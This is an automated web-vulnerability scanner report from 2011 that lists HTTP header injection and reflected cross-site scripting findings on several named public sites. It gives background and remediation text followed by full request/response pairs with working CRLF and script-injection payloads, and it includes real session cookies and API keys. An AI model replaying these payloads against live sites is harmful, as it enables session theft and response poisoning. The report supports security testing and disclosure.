HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload e98b7%0d%0a72138907069 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2171139&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0e98b7%0d%0a72138907069; ActivityInfo=000p81bBo%5f; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g
The value of REST URL parameter 3 is copied into the Location response header. The payload 44609%0d%0a823a43cd739 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/44609%0d%0a823a43cd739 HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:10:48 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26
Set-Cookie: JSESSIONID=6B551B6EF292368753CEA0B23B3B8F3A.ftb-web4; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/44609
823a43cd739?shouldTest=true
Content-Language: en-US
Content-Length: 0
Connection: close
Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload 49dfd%0d%0ab7061f6f456 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /49dfd%0d%0ab7061f6f456/worldnews/worldnews.asp HTTP/1.1
Host: www.fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 01:52:12 GMT
Connection: close
Location: /fis/error/error.asp?404;http://www.fis.com/49dfd
b7061f6f456/worldnews/worldnews.asp
The value of REST URL parameter 2 is copied into the Location response header. The payload d412c%0d%0ad95cbc5e854 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /fis/d412c%0d%0ad95cbc5e854/worldnews.asp HTTP/1.1
Host: www.fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 01:52:17 GMT
Connection: close
Location: /fis/error/error.asp?404;http://www.fis.com/fis/d412c
d95cbc5e854/worldnews.asp
2. Cross-site scripting (reflected)
There are 182 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc.).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the shifth request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 66993%3balert(1)//766c94fef6e was submitted in the shifth parameter. This input was echoed as 66993;alert(1)//766c94fef6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/delivery/al.php?zoneid=113&cb=INSERT_RANDOM_NUMBER_HERE&layerstyle=simple&align=center&valign=middle&padding=2&closetime=8&padding=2&shifth=066993%3balert(1)//766c94fef6e&shiftv=0&closebutton=t&backcolor=FFFFFF&bordercolor=000000 HTTP/1.1
Host: ad.thehill.com
Proxy-Connection: keep-alive
Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4
Response
HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Date: Thu, 03 Feb 2011 01:32:17 GMT
Content-type: application/x-javascript
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4; expires=Fri, 03-Feb-2012 01:32:17 GMT; path=/
Server: lighttpd/1.4.22
Content-Length: 4484
The value of the shiftv request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7de03%3balert(1)//1688d5789ce was submitted in the shiftv parameter. This input was echoed as 7de03;alert(1)//1688d5789ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/delivery/al.php?zoneid=113&cb=INSERT_RANDOM_NUMBER_HERE&layerstyle=simple&align=center&valign=middle&padding=2&closetime=8&padding=2&shifth=0&shiftv=07de03%3balert(1)//1688d5789ce&closebutton=t&backcolor=FFFFFF&bordercolor=000000 HTTP/1.1
Host: ad.thehill.com
Proxy-Connection: keep-alive
Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4
Response
HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Date: Thu, 03 Feb 2011 01:32:12 GMT
Content-type: application/x-javascript
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4; expires=Fri, 03-Feb-2012 01:32:12 GMT; path=/
Server: lighttpd/1.4.22
Content-Length: 4484
The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 6c818<img%20src%3da%20onerror%3dalert(1)>15cd25761cc was submitted in the method parameter. This input was echoed as 6c818<img src=a onerror=alert(1)>15cd25761cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /restserver.php?v=1.0&method=links.getStats6c818<img%20src%3da%20onerror%3dalert(1)>15cd25761cc&urls=%5B%22http%3A%2F%2Fnews.change.org%2Fstories%2Fnobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi%23share_source%3Dblog-top_fb%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E36bc7e08caf=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF
Response
HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Thu, 03 Feb 2011 01:33:00 GMT
Content-Length: 427
The value of the urls request parameter is copied into the HTML document as plain text between tags. The payload 7250b<img%20src%3da%20onerror%3dalert(1)>3afeaa161d5 was submitted in the urls parameter. This input was echoed as 7250b<img src=a onerror=alert(1)>3afeaa161d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fnews.change.org%2Fstories%2Fnobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi%23share_source%3Dblog-top_fb%22%5D7250b<img%20src%3da%20onerror%3dalert(1)>3afeaa161d5&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E36bc7e08caf=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF
Response
HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Wed, 02 Feb 2011 17:35:11 -0800
Pragma: 
X-Cnection: close
Date: Thu, 03 Feb 2011 01:33:11 GMT
Content-Length: 443
fb_sharepro_render({"error_code":114,"error_msg":"param urls must be an array.","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats"},{"key":"urls","value":"[\"http:\/\/news.change.org\/stories\/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi#share_source=blog-top_fb\"]7250b<img src=a onerror=alert(1)>3afeaa161d5"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});
The value of the format request parameter is copied into the HTML document as plain text between tags. The payload 9ff8c<script>alert(1)</script>d0cbfd0ba59 was submitted in the format parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/click?format=jsonp9ff8c<script>alert(1)</script>d0cbfd0ba59&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=http%3A%2F%2Fwww.invisionpower.com%2Fproducts%2Fnexus%2F&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c
Response
HTTP/1.1 400 Bad Request
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/plain
Date: Wed, 02 Feb 2011 23:58:36 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Content-Length: 71
Connection: keep-alive
The value of the jsonp request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e7c41%3balert(1)//89d5419dbd6 was submitted in the jsonp parameter. This input was echoed as e7c41;alert(1)//89d5419dbd6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /api/click?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=http%3A%2F%2Fwww.invisionpower.com%2Fproducts%2Fnexus%2F&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491e7c41%3balert(1)//89d5419dbd6 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 23:58:43 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Content-Length: 102
Connection: keep-alive
The value of the out request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 875ad'%3balert(1)//6f691d8d147 was submitted in the out parameter. This input was echoed as 875ad';alert(1)//6f691d8d147 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /api/click?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=http%3A%2F%2Fwww.invisionpower.com%2Fproducts%2Fnexus%2F875ad'%3balert(1)//6f691d8d147&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 23:58:38 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Content-Length: 103
Connection: keep-alive
The value of the out request parameter is copied into the HTML document as plain text between tags. The payload 89bf8<script>alert(1)</script>0d35527ef71 was submitted in the out parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/click?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=89bf8<script>alert(1)</script>0d35527ef71&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 23:58:41 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Content-Length: 72
Connection: keep-alive
The value of the key request parameter is copied into the HTML document as plain text between tags. The payload 4b46b<script>alert(1)</script>e43aee83162 was submitted in the key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/ping?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b4b46b<script>alert(1)</script>e43aee83162&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&jsonp=vglnk_jsonp_12966856066450 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c
Response
HTTP/1.1 500 Internal Server Error
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 02 Feb 2011 22:26:57 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 97
error: Unknown api key: 4f085ab2452b05f4c24c6b37dbc58a3b4b46b<script>alert(1)</script>e43aee83162
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42e41</script><script>alert(1)</script>a2217655438 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs42e41</script><script>alert(1)</script>a2217655438= HTTP/1.1
Host: arbor.custhelp.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=aUIUK5KMoF8afUrgJZXdnTjniX2eWSZxWh5wv4GsY1ETUucC0FSvrROU8rzFkSGH8ELvaWUESkFC7%7Ev2PKLcBoiib8DDn%7ET5K79FiThCqZvWeIJzw%7EkKsc0RNJHwnC47I3alT3AmrYr294Neqg0ltc9a3jcYBEfhFtH_DnGuIoUoqAvOf7rsP3oslXQY8lCo467qU8ITfv3vk0rrLEiVzJNz_p8A0Sf_kPsKHlwQO%7EVpVXIOzbcOMScUl8xnVTcCL3VtvckKO5XaK6r%7ELoe8W81%7E5k2bopUsy5_eW9GqqNRQoWbjAXA3_1RnJSytEve0Fd0KnSwcw8di6mpfxHlh4avqlSSRAFAb6m7dwm7faRO3vz2AQezeyleg%21%21
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:42:03 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUx6oW8tRuC50eDPRl97npFuaGOMHZn11NBeN10rkeSZPQgfvVRx_vSuEVGvGk0mz1YIl66klbzDAz4DZ182Z1g2kuAlaPwudchWaGV0lrblKY0vtyrTDDdJ79GQdJGzc8AyEa7pPjYaY2Zu0yuUACJsF%7EJtE%7EioMbnns6N4y50a8cshftqy6qCLau3o8Zwemiu0KpfY0iRiilrQMFwJWssTx%7EYINE1554YiykSPZP7F0IBDazYu6U3ycZMVMfr0QLbP5KPEGQ_vEeZLeda09%7EVPWRykFc8y_ukjAbGNAMFht1JGBgjah0G2TUgQ0nSW75STNcK4H4AQoYJV7UCGSR79sTFZIQONMSPahHDaYJfXgZKzZxTmdV_GJ8hU5tlHR04ytmnxPNqwFRehwSL0RTPnZG3thL%7EVHjHZV56Eb_V85eqHkXObQD0Zm0p10961KoojryKWDSFgzM2niBSNac0fLu7K4LulL54z_WGQJduoFwvteqHRIwoYdAobOou2EW%7ExQ4oFScfPE%21; path=/; httponly
RNT-Time: D=118859 t=1296697323108634
RNT-Machine: 01
F5_do_compression: yes
Keep-Alive: timeout=15, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 25359
2.11. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3aa72</script><script>alert(1)</script>2ea59d67104 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?3aa72</script><script>alert(1)</script>2ea59d67104=1 HTTP/1.1
Host: arbor.custhelp.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=aUIUK5KMoF8afUrgJZXdnTjniX2eWSZxWh5wv4GsY1ETUucC0FSvrROU8rzFkSGH8ELvaWUESkFC7%7Ev2PKLcBoiib8DDn%7ET5K79FiThCqZvWeIJzw%7EkKsc0RNJHwnC47I3alT3AmrYr294Neqg0ltc9a3jcYBEfhFtH_DnGuIoUoqAvOf7rsP3oslXQY8lCo467qU8ITfv3vk0rrLEiVzJNz_p8A0Sf_kPsKHlwQO%7EVpVXIOzbcOMScUl8xnVTcCL3VtvckKO5XaK6r%7ELoe8W81%7E5k2bopUsy5_eW9GqqNRQoWbjAXA3_1RnJSytEve0Fd0KnSwcw8di6mpfxHlh4avqlSSRAFAb6m7dwm7faRO3vz2AQezeyleg%21%21
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:41:08 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
